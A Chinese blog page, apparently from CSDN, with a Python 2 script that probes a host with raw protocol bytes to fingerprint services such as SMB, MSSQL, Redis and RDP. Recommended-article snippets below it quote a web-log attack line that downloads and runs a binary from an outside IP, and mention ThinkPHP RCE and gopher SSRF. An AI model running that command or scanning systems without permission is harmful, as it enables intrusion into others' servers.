各种应用服务指纹探测

最新推荐文章于 2023-05-29 11:21:31 发布
原创 最新推荐文章于 2023-05-29 11:21:31 发布 · 1.5k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 

import socket
def main(host,port):
    socket.setdefaulttimeout(5)
    http="GET \r\n"
    smb= '\x00\x00\x00\xa4\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x08\x01\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x06\x00\x00\x01\x00\x00\x81\x00\x02PC NETWORK PROGRAM 1.0\x00\x02MICROSOFT NETWORKS 1.03\x00\x02MICROSOFT NETWORKS 3.0\x00\x02LANMAN1.0\x00\x02LM1.2X002\x00\x02Samba\x00\x02NT LANMAN 1.0\x00\x02NT LM 0.12\x00'
    #mysql="\x3c\x00\x00\x01\x0a\x35\x2e\x37\x2e\x31\x2d\x54\x69\x44\x42\x2d\x31\x2e\x30\x00\x6e\x02\x00\x00\x5f\x62\x0c\x7b\x2e\x27\x5a\x6a\x00\x8f\xa2\x21\x02\x00\x13\x00\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x19\x27\x25\x2e\x79\x79\x3b\x2a\x19\x41\x5f\x27\x00"
    mssql = "\x12\x01\x00\x34\x00\x00\x00\x00\x00\x00\x15\x00\x06\x01\x00\x1b\x00\x01\x02\x00\x1c\x00\x0c\x03\x00\x28\x00\x04\xff\x08\x00\x01\x55\x00\x00\x00\x4d\x53\x53\x51\x4c\x53\x65\x72\x76\x65\x72\x00\x48\x0f\x00\x00"
    postgresql = "\x00\x00\x00\x54\x00\x03\x00\x00\x75\x73\x65\x72\x00\x70\x6f\x73\x74\x67\x72\x65\x73\x00\x64\x61\x74\x61\x62\x61\x73\x65\x00\x70\x6f\x73\x74\x67\x72\x65\x73\x00\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x5f\x6e\x61\x6d\x65\x00\x70\x73\x71\x6c\x00\x63\x6c\x69\x65\x6e\x74\x5f\x65\x6e\x63\x6f\x64\x69\x6e\x67\x00\x55\x54\x46\x38\x00\x00"
    rdp = "\x03\x00\x00\x13\x0E\xE0\x00\x00\x00\x00\x00\x01\x00\x08\x00\x03\x00\x00\x00"
    redis="info\r\n"
    memcached="\x80\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    netbios="\x10\x7e\x01\x10\x00\x01\x00\x00\x00\x00\x00\x00\x20\x46\x4b\x45\x49\x46\x44\x44\x43\x44\x46\x44\x47\x44\x45\x44\x44\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x41\x41\x00\x00\x20\x00\x01"
    svn=""
    dns = "\x00\x44\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x03\x77\x77\x77\x04\x73\x69\x6e\x61\x03\x63\x6f\x6d\x00\x00\x02\x00\x01"
    proxy = "\x05\x01\x00\x01"
    oracle= "\x00\x3a\x00\x00\x01\x00\x00\x00\x01\x39\x01\x2c\x00\x00\x08\x00\x7f\xff\xc6\x0e\x00\x00\x01\x00\x00\x00\x00\x3a\x00\x00\x08\x00\x41\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    mongodb="\x00\x00\x00\xa7A\x00\x00\x00\x00\x00\x00\xd4\x07\x00\x00\x00\x00\x00\x00admin.$cmd\x00\x00\x00\x00\x00\xff\xff\xff\xff\x13\x00\x00\x00\x10ismaster\x00\x01\x00\x00\x00\x00"
    elasticsearch="GET /_cat HTTP/1.1\r\n\r\n"
    #list=[smb,mysql,mssql,postgresql,rdp,redis,memcached,netbios,svn,proxy,oracle,mongodb,elasticsearch]
    mysql="\x3c\x00\x00\x01\x0a\x35\x2e\x37\x2e\x31\x2d\x54\x69\x44\x42\x2d\x31\x2e\x30\x00\x6e\x02\x00\x00\x5f\x62\x0c\x7b\x2e\x27\x5a\x6a\x00\x8f\xa2\x21\x02\x00\x13\x00\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x19\x27\x25\x2e\x79\x79\x3b\x2a\x19\x41\x5f\x27"
    body = "ifconfig"
    shellcode=mysql+body
    print [shellcode]
    list=[shellcode]
    udplist=[dns]
    for i in list:
      try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.connect((host, port))
            sock.send(i)
            packet=sock.recv(1024)
            print [packet]
            print packet
            if "SMB" in packet:
                print "smb"
            if "MySQL" in packet:
                print "mysql"
            if "\x04\01" in packet:
                print "mssql"
            if "R\x00\x00\x00" in  packet[0]:
                print "postgresql"
            if "\x03\x00\x00\x13" in packet:
                print "rdp"
            if ("redis" or  "-NOAUTH Authentication") in packet:
                print "redis"
            if "\x81\x0b" in packet:
                print "memcached"
            if "\x83\x00\x00\x01" in packet:
                print "netbios"
            if "( success ( 2 2" in packet:
                print "svn"
            if "\x05\x00" in packet:
                print "proxy"
            if "\x00Y\x00" in packet:
                print "oracle"
      except Exception ,e:
          print e
    # for j in udplist:
    #   try:
    #     sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    #     sock.connect((host, port))
    #     sock.send(j)
    #     packet=sock.recv(1024)
    #
    #     if "wwwsinacom" in packet:
    #         print "dns"
    #   except Exception,e:
    #       print e
if __name__ == '__main__':
    url = 'http://127.0.0.1:4000/'
    host = url.split(":")[1][2:]
    port1 = url.split(":")[2]
    l = len(port1)
    port = port1[-l:l - 1]
    main(host,int(port))


网络安全设备资产指纹收集:应用指纹的探索与实践
不忘初心,护天下安全!
11-11 373
设备资产指纹收集是一项网络攻防对抗中至关重要的任务。其中,应用指纹的收集对于准确识别网络中的各类应用程序、评估潜在安全风险以及制定有效的安全策略具有关键意义。本文将深入探讨网络安全设备资产指纹收集的关键技术,重点介绍我们团队收集的应用指纹集,并推荐一些相关的开源工具。
Nmap渗透测试指南之指纹识别与探测、伺机而动
weixin_54626591的博客
10-16 800
Nmap渗透测试指南之指纹识别与探测、伺机而动
nginx的access日志打印十六进制\x16\x03\x01\x02\x00\x01
ChenYaZhou的专栏
01-22 7523
在Nginx没有开启SSL支持的情况下,Nginx将https连接建立过程中的客户端hello报文当作http报文处理,暴力的截取了报文中指定位置的十六进制字符串当作了$request的http请求方法、URL和版本号,所以access日志中会出现十六进制字符串。.怀疑是中文,照着网上的方法将nginx的logformat增加一个escape属性“log_format main escape=json”,结果打印的十六进制部分变成了“\u0016\u0003\u0001\u0002”,失败!
SMB(Server Message Block) Protocal Research
weixin_30647065的博客
05-30 162
catalogue 1. 什么是SMB 2. 基础SMB协议 3. SMB Clients and Servers 1. 什么是SMB 全世界有很多的客户端和服务端软件实现了SMB协议,全部windows工作站,windows 95,windows NT系统都同时支持SMB客户端和服务端 SMB本质上一种服务消息块(Server Message Block),它可以实现 ...
关于gopher协议的ssrf攻击
qq_69775412的博客
04-26 3566
Gopher协议浅析 Gopher协议是internet的一个信息查找系统,俗称万能协议,可以通过gopher访问对应计算机上的其他资源,例如利用gopher实现:GET请求,POST请求,内网的redis,mysql(以及各类关系型数据库)未授权访问,以及MongoDB,Memcache等。 协议详情 端口 默认为70端口,可以自定义 协议格式 gopher://127.0.0.1:70/_[data] “
南大通用数据库-Gbase-8a-报错集锦-02-metadata is incomplete on localhost
qq_45111959的博客
05-29 1811
介绍如何解决南大通用数据库-Gbase-8a-报错:metadata is incomplete on localhost,内含具体解决方法。
超强指纹识别工具,4W+应用指纹识别
最新发布
09-05
该工具能够识别超过四万个不同的应用指纹,这意味着它能够覆盖绝大多数市面上的应用系统。对于网络安全人员来说,这意味着他们能够更快地了解网络中的各项资产,从而进行有效的风险评估和安全防护措施的部署。 指纹...
EHole3.0重构版:红队系统指纹探测新利器
系统指纹探测是评估目标系统安全性的关键步骤之一,目的是收集目标系统的技术信息,包括操作系统类型、版本、运行的服务以及正在使用的软件等。通过对这些信息的分析,攻击者能够识别潜在的安全漏洞和弱点,从而设计...
支持指纹模块的服务器,指纹模块
weixin_42545292的博客
07-31 767
指纹模块是指纹锁的核心部件,安装在如指纹门禁或者硬盘等器件上,用来完成指纹的采集和指纹的识别的模块。指纹模块主要由指纹采集模块、指纹识别模块和扩展功能模块(如锁具驱动模块)组成。中文名指纹模块外文名fingerprint module比对时间<1秒认假率0.0001[%]拒真率0.01[%]应用指纹锁的核心部件指纹模块分类编辑语音指纹模块按其指纹识别方式可以分为光学指纹模块:靠光的折...
\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr针对thinkphp的远程代码执行漏洞进行的攻击
lsd19880914的博客
08-21 1万+
106.14.83.56 - - [20/Aug/2020:10:21:54 +0800] "GET / HTTP/1.0" 403 162 "-" "-" 106.14.83.56 - - [20/Aug/2020:10:22:05 +0800] "GET / HTTP/1.0" 403 162 "-" "-" 106.14.83.56 - - [20/Aug/2020:10:22:05 +0800] "GET / HTTP/1.1" 403 162 "-" "-" 47.100.130.114 - -.
使用Java定时从Nginx的日志中获取黑客的ip并加入访问黑名单
皓亮君的博客
01-16 7304
文章目录简介使用nginx的deny属性禁止黑名单IP访问Java工具类1.定义恶意攻击代码信息列表2.解析nginx日志中的非法访问的IP地址3.写入nginx的黑名单文件中4.工具类集成方法5.测试Main函数定时执行工具类的方式1.把工具类打包成jar,然后写入到linux的crontab事件中2.使用Java定时任务实现实战效果 简介 最近发现公司线上的应用老出现访问异常的情况,排查nginx的access.log日志文件,发现了大量恶意攻击的代码,内容如下 主要内容为"\x03\x00\x00/
关于samba
patiencezzz的博客
04-09 224
关于Samba Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成。SMB(Server Messages Block,信息服务块)是一种在局域网上共享文件和打印机的一种通信协议,它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。SMB协议是客户机/服务器型协议,客户机通过该协议可以访问服务器上的共享文件系统、打印机及...
【网络安全】 关于http服务器遭受webshell攻击
jn10010537的博客
09-17 3323
【windows10】 关于http服务器遭受webshell攻击1、背景2、ip地址查询3、可疑请求ip 1、背景 在阿里云公网上部署web服务器,最近客户反映我的服务经常断掉,查看后台日志,发现境外的IP攻击。 比如: 209.141.56.212 - - [17/Sep/2021 04:52:04] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\/154.16.118.104/arm7;chmod+777+arm7;./arm7+0day.jawsv
pymssql查询表数据返回 ASCII 码值b'\x01\x00\x00\x00'
热门推荐
Expec-乐的博客
05-11 1万+
在查询SqlServer中表数据时返回结果出现b'\x01\x00\x00\x00',列类型为sql_variant、经过搜索一番,查询该类型列数据需要转换为字符串才可以,如: CONVERT(VARCHAR(40,列名))
linux 接受dns报文,Linux下构造UDP原始数据报-DNS报文示例C语言实现
weixin_35319943的博客
05-13 181
这几天构造一个DNS报文,查了好些资料,好象许多朋友对UDP报文的校验和老是出问题,自己试了一些例子代码,也有问题。所以花了一些时间,做了一个成功的例子,在Linux下GCC通过并验证成功。#include #include #include #include #include #include #include #include #includeunsigned short checksum(u...
信息收集(指纹识别)
F2444790591的博客
02-09 2498
一、系统指纹识别 方法一:通过TCP/IP数据包发到目标主机,由于每个操作系统类型对于处理TCP/IP数据包都不相同,所以可以通过之间的差别判定操作系统类型。nmap识别操作系统指纹必须使用端口,所以不允许添加-sn参数。 方法二:每个操作系统都有特有的服务和端口,如:windows桌面连接使用的3389 RDP协议;445端口windows的smb协议开启端口;iis 80端口。 ​​​​​​​ ......
python显示图片二进制流乱码_请问 flask 如何正确的获取上传的二进制流图片?...
weixin_39953356的博客
12-05 1622
用 postman 测试上传的格式为 binary,选择的图片名为 lf64.pngfile = request.get_data()print(file)获取到了二进制数据,数据如下,(后面都是二进制数据,没有字了)。我应该怎么样对这个数据反序列得到我要的文件呢?请教各位!!!b'\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\[emailprotect...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值